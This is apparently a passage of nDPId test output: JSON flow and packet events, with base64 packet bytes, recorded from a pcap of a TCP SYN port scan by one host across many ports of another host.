-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsL+0AAC4G6oWsEAAIQA2GNIzSH1XdUoMYAAAAAGACDAANOgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsKdMAADAG7p+sEAAIQA2GNIzSDb3dUoMYAAAAAGACBAAm0gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsms0AADcGdqWsEAAIQA2GNIzSBEDdUoMYAAAAAGACEAAkTwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059281,"pkt":"ACYLMQczACWzv5HuCABFAAAsCD4AADcGCTWsEAAIQA2GNIzSA+fdUoMYAAAAAGACEAAkqAAAAgQFtA=="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1278275059338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275059338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAA1jNJCmj\/E3VKDGWASFtCfagAAAgQFZAAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9vMAADkGGH+sEAAIQA2GNIzdAHHcUoIYAAAAAGACCAAyEwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw0AAACkGXDKsEAAIQA2GNIzTG57dU4MZAAAAAGACCAAU7gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs0NgAACYGUZqsEAAIQA2GNIzTCJjdU4MZAAAAAGACDAAj9AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsa6EAACwGsNGsEAAIQA2GNIzTDOXdU4MZAAAAAGACBAAnpwAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8IAADkGn7CsEAAIQA2GNIzTAKPdU4MZAAAAAGACCAAv6QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHD8AADUG9zOsEAAIQA2GNIzTgAzdU4MZAAAAAGACCACwfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsHIEAAC0G\/vGsEAAIQA2GNIzTHufdU4MZAAAAAGACCAARpQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAszKQAACgGU86sEAAIQA2GNIzTH6TdU4MZAAAAAGACBAAU6AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4YAADUGr+ysEAAIQA2GNIzTB0bdU4MZAAAAAGACCAApRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKsAACcGrMesEAAIQA2GNIzTJtjdU4MZAAAAAGACEAABtAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VwAADcGHBasEAAIQA2GNIzTK2fdU4MZAAAAAGACEAD9JAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAsIMIAACsG\/LCsEAAIQA2GNIzTAobdU4MZAAAAAGACEAAmBgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059345,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/RQAADUGFl6sEAAIQA2GNIzSFxLdUoMYAAAAAGACCAAZfQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2288,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsApgAADUGENusEAAIQA2GNIzSCPDdUoMYAAAAAGACCAAnnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1719,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAscmgAADsGmwqsEAAIQA2GNIzSBrfdUoMYAAAAAGACEAAh2AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/kAADQGmHmsEAAIQA2GNIzSJMrdUoMYAAAAAGACBAAPxQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJwAAC8GyNasEAAIQA2GNIzSJxDdUoMYAAAAAGACEAABfwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAs0FAAADkGPyKsEAAIQA2GNIzSTj\/dUoMYAAAAAGACCADiTwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAsew8AAC4Gn2OsEAAIQA2GNIzSEdfdUoMYAAAAAGACDAAauAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"synscan.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059346,"pkt":"ACYLMQczACWzv5HuCABFAAAso\/UAADkGa32sEAAIQA2GNIzSIAHdUoMYAAAAAGACCAAQjgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
